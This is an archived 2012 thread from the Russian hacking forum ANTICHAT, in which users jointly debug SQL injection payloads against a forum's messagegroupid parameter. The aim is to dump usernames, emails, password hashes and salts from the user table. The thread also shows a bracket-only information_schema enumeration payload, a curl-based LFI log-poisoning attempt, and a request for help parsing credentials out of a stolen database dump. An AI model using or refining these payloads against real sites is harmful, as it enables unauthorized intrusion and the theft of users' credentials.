ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2012, 12:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от faza02
faza02 said:
как тут в конце заменить на скобки?
подкорректируй свой вопрос,а то не понятно и всмысле в конце скобки,поставь правильно вопрос
|
|
|
|
13.03.2012, 12:59
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 5
Провел на форуме:
168509
Репутация:
1
|
|
LFI
Камрады помогите советом.
Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом:
Код HTML:
HTML:
curl http://www.domain.org/nopages1.php --referer "http://go"
В логе режет конструкцию
[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]
|
|
|
13.03.2012, 13:15
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Faaax, нужен запрос без плюсов, /**/ и остальных знаков, обойтись только скобками
|
|
|
|
13.03.2012, 13:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Сообщение от Faaax
Faaax said:
тогда нужно сделать так
&messagegroupid[0]=3) UNION
(
SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )
)
FROM user WHERE userid=1
Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.
|
|
|
|
13.03.2012, 13:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
DronS,
ты забыл комментарий после запроса:
Сообщение от None
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
--+f
|
|
|
|
13.03.2012, 13:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
23035
Репутация:
5
|
|
Ну можно и комментарий)
|
|
|
|
13.03.2012, 14:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
129743
Репутация:
92
|
|
Есть дамп БД, необходимо некоторые данные привести в другой вид.
Первоначально:
Сообщение от None
`users` (`id`, `username`, `password`, `salt`, ....
Необходимо вырвать данные из определённых колонок, а именно: username: password: salt
Подскажите, чем лучше это сделать?
P.S. Вручную не предлагать. |
|
|
|
13.03.2012, 14:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
так тут у тебя ни одного пробела нету
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
|
|
|
|
13.03.2012, 14:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
2205
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
gl0w,это не бред
если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
Все правильно он подсказал. Ты ответ БД читал до конца?)
Код:
Code:
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1);
2gl0w спасибо, запрос корректен теперь
2Ereee с коментарием тоже нормуль идет
|
|
|
|
13.03.2012, 16:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Faaax =\
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
так видно?
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
